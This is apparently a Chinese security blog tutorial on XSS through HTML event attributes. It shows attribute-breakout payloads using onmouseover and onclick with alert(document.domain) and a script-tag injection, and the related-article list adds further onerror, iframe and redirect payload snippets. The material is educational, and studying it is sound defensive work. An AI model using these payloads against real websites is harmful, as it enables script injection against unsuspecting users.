【安全】P 4-10 HTML事件中的XSS

最新推荐文章于 2024-04-14 21:29:25 发布
最新推荐文章于 2024-04-14 21:29:25 发布
阅读量210 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113855054
版权

目录

0x01 HTML事件介绍

在现代浏览器中都内置有大量的事件处理器。这些处理器会监视特定的条件或用户行为,例如鼠标单击或浏览器窗口中完成加载某个图像。通过使用客户端的 JavaScript,可以将某些特定的事件处理器作为属性添加给特定的标签,并可以在事件发生时执行一个或多个 JavaScript 命令或函数。
在这里插入图片描述

0x02 XSS漏洞发现

设置独一无二字符串提交,在响应中寻找。

在这里插入图片描述

0x03 闭合思路分析

1、通过HTML事件来触发XSS,

” onmouseover=”alert(document.domain)

2、闭合input标签,加入

<script>alert(document.domain);</script>

0x04 Payload触发XSS漏洞

" οnclick="alert(document.domain)"

在这里插入图片描述
----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS学习(一)之HTML
Praifire的博客
08-11 1973
学习网站:http://xsst.sinaapp.com/example/1-1.php 一、Xss全称是cross site scripting,即跨站脚本攻击。 二、用处:作为用来窃取信息的主要攻击方式。 三、Cookies :Cookies一词用在程序设计是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。从本质上讲,它可以看作是你的身份证
XSS常见的触发标签
热门推荐
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
攻击html页面,v-htmlXSS 攻击
weixin_36073959的博客
06-08 1272
在 Vue 有 v-html 这个便利的指令,可以让我们直接输出 HTML,但它有个缺点。Vue 官网这样解释这个「指令」双大括号会将数据解释为普通文本,而非 HTML 代码。为了输出真正的 HTML,你需要使用 v-html 指令:Using mustaches: {{ rawHtml }}Using v-html directive: 输出代码:Using mustaches: This s...
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
XSS HTMLFILTER
10-07
你还在为防范xss注入攻击而头疼吗,开源的XSS HTMLFILTER工具类能帮你过滤表单或链接敏感的js html字符,有完整的源代码和代码示例 为您的系统增添xss的第一道防护
Web安全XSS攻击与防御小结
10-17
通过在URL参数传递不同的XSS payload,观察其在浏览器的效果,比如利用`<img>`标签的`onerror`事件、`<p>`标签的`onclick`属性以及`<iframe>`标签植入恶意内容。这些例子展示了XSS攻击的不同形式,包括自动触发...
spring-boot-xss
05-13
< p> < c xss=removed></ p></ body ></ html > 该示例演示了如何在HTML上下文正确地编码不受信任的值alert(7)HTML,但是在[removed]是不安全的。 但是,这不是很现实,因为用户可能会将不...
第十节 xss filter过滤器-01
09-15
在Web应用程序XSS(Cross-Site Scripting)是一种常见的安全漏洞。攻击者可以通过在Web应用程序 inject 恶意脚本,从而获取用户的敏感信息或控制用户的行为。为了防止这种攻击,开发者需要对用户输入的数据...
商业编程-源码-IPB(Invision Power Board) v2.1.5 繁体文语言包GBK.zip
06-21
5. **安全性**:商业论坛的安全至关重要,开发者应关注如何防止SQL注入、XSS攻击等安全威胁,并了解如何应用安全最佳实践。 6. **性能优化**:针对大型社区,优化代码和数据库查询以提高论坛性能是关键。这可能涉及...
用v-html解决Vue.js渲染html标签不被解析的问题
10-20
需要注意的是,使用`v-html`存在XSS(跨站脚本攻击)的安全风险,因为它是直接将HTML注入到页面上。为了防止恶意代码的执行,应当确保数据来源可信,或者在服务器端对HTML内容进行安全过滤和转义。如果必须要展示...
xss常用标签和触发事件
最新发布
2301_81475812的博客
04-14 651
img src="x" onerror=document.location=``//www.baidu.com``>html标签用//可以代替http://<img src="x" onerror="document.location=``http://www。<iframe src="javascript:prompt(``xss``)"></iframe>(````只有两个``)
xss攻击
m0_73170217的博客
02-01 372
xss跨站脚本攻击、利用及防御
html标签onclick 嵌套单双引号及XSS的处理方法
liduanwh的博客
02-18 3443
onclick="updateCategory(event, '${fn:replace(fn:replace(e:forHtmlContent(item.key), "'", "\\'"), '"', '&amp;quot;')}');" item.key的内容为 test &lt;IMG SRC=# onmouseover="alert('test')"&gt; 注意几点 1. &am
java过滤%3c p%3e标签_XSS注入方式和逃避XSS过滤的常用方法(整理)
weixin_42514288的博客
02-27 1439
(转自黑吧安全网http://www.myhack58.com/)web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式:一、html标签注入这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer)正则过滤的解决办法,php一般会使用htmlspecialchars或者htmlentities函数进行转义注入方式有/图片标签/连接标签/...
xss攻击 html代码,常见的XSS攻击代码
weixin_35671110的博客
06-07 2054
第一类:在html标签事件触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用。eg:1.使html元素占据整个显示页面 2.增加属性触发事件 3.自动触发事件在真实环境,‘ 、" 、( 、) 都是属于黑名单的成员,如果遇到以上四个字符被过滤的情况,那么我们就需要使用其他字符去代替,或者编码的方式去绕过。eg:1.不使用 " 2.不使用 ‘ 3.不使用...
html5 新标签xss,HTML5 localStorageXSS漏洞
weixin_30054007的博客
06-16 392
localStorage基础WindowlocalStorage属性HTML5 提供了两种新的本地存储方案,sessionStorage和localStorage,统称WebStorage。顾名思义:sessionStorage 是针对session的数据存储,关闭窗口后删除。localStorage 是一个本地的没有时间限制的数据存储。它们同样遵循SOP语法:window.localStor...
挖洞经验 | 可以被XSS利用的HTML标签和一些手段技巧,靠挖SRC漏洞每月多赚15k
jennycisp的博客
10-26 801
*”。**网上关于XSS的教程数不胜数,转载来转载去的,就是那么些Payload,可能看的人晕晕的不知所以然。而且还有很多Payload就算把其HTML代码闭合后写在自己的前端,都不一定触发,因为很多老的标签和事件都已经被W3C给废弃了。本文首先给大家总结一下目前通用可以拿来构造XSSHTML标签和一些标签事件,然后再给大家讲述一些绕过的技巧,教你在么构造出属于你自己渗透时真正需要的Exp。
XSS爬坑之路一】初识XSS
SunJ3t的菠萝屋
09-27 350
XSS,跨站脚本攻击(Cross Site Scripting),是一种注入式攻击。为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS
网络安全 / 前端 XSS 防护】一文带你了解 HTML 的特殊字符转义及编码
胡西风的博客
04-01 318
如果用户输入的内容未经过转义或编码处理,并且在个人简介页面上直接显示,那么攻击者可以在自我介绍插入恶意 HTML 标签或属性。例如,当浏览器检测到页面的特殊字符被正确转义或编码时,它们会将其视为纯文本,不会将其解析为 HTML 标签或脚本。转义时应考虑多重编码:当字符传输经过多个层级或环节时,确保在每个层级或环节上都进行了正确的编码和转义处理。这样,HTML 标签和属性不再被解析为可执行的代码,保护了页面和用户的安全。这样,URL 的特殊字符被转义为实体编码,防止了恶意代码的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值